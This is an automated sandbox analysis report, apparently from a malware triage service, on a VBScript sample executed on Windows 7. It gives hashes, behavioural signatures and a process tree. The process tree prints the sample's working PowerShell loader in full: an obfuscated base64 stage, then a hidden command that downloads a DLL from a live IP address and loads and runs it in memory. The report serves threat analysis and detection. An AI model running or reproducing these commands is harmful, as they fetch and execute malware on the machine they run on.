Analysis
-
max time kernel
43s -
max time network
46s -
platform
windows7_x64 -
resource
win7-20220718-en -
resource tags
arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system -
submitted
11/08/2022, 18:00
Static task
static1
Behavioral task
behavioral1
Sample
6e4b16840770fe3b078206831254d138.vbs
Resource
win7-20220718-en
General
-
Target
6e4b16840770fe3b078206831254d138.vbs
-
Size
204KB
-
MD5
6e4b16840770fe3b078206831254d138
-
SHA1
12da33c6224a67811698b2b6c8fb771357a43638
-
SHA256
7d725947a2cc12a85a532d67444856f521749057a8263a10880634642c2276eb
-
SHA512
a318aaabe1c9f226d2abaf1556a6693d364676e123e7572a7c95ee44b3f28e1c59f8d7d8a6c203a6e05e0de0f6f0394d6b7c52e8851d2f171880f179a9cdba37
Malware Config
Extracted
http://91.241.19.49/ARTS/dllf3txt
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 624 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1576 powershell.exe 624 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1576 powershell.exe Token: SeDebugPrivilege 624 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1804 wrote to memory of 1576 1804 WScript.exe 27 PID 1804 wrote to memory of 1576 1804 WScript.exe 27 PID 1804 wrote to memory of 1576 1804 WScript.exe 27 PID 1576 wrote to memory of 624 1576 powershell.exe 29 PID 1576 wrote to memory of 624 1576 powershell.exe 29 PID 1576 wrote to memory of 624 1576 powershell.exe 29
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6e4b16840770fe3b078206831254d138.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAEsASQB0AE8ATwBQAF⌚⌚⌚AaQBTAE8AVQBsAFEARABqAHYAWABBAE8AZwAlACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsA⌚⌚⌚wB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgA0ADEALgAxADkALgA0ADkALwBBAFIAVABTAC8AZABsAGwAZgAzAHQAeAB0ACcAKQApADsAWwBTAHkAcwB0AG⌚⌚⌚AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAeABLAHYASwBrAH⌚⌚⌚ATgBaAC4AVQBHAGwAeQBtAHoAVQBnACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBVAEQAcwBTAGkARABiAGIAJwApAC4ASQBuAHYAbwBrAG⌚⌚⌚AKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgAxAFgAWgAvAHcAZQBuAC8AdABzAG⌚⌚⌚AdAAvADkANAAuADkAMQAuADEANAAyAC4AMQA5AC8ALwA6AHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnAC8AeQB1ADcAeQA2AC⌚⌚⌚AJAAhACIAIwAkAC⌚⌚⌚AJgAvACgAKQA9ACcAIAApACkA';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('%KItOOPUiSOUlQDjvXAOg%', 'C:\Users\Admin\AppData\Local\Temp\6e4b16840770fe3b078206831254d138.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\6e4b16840770fe3b078206831254d138.vbs';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ARTS/dllf3txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('txt.1XZ/wen/tset/94.91.142.19//:ptth' , $RodaCopy , '/yu7y6%$!"#$%&/()=' ))"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:624
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5138491953f88fa84ce487a0103bea8dd
SHA14b03d629d82b102099decb7704ac8d38575b3d7a
SHA25675eb0b1be5bce202000050b78f88d6ea79f302237d64d06c82cbe2e6b57794f3
SHA512d01db0d9342ff66eae314e7866a68d318d8e541b7ee9e3dbfa49bd734bc98b134fa9584a2d76ca92c11c52e01c12d5ea19c4fa9bbe3f01ee5a702c5c3d99a85c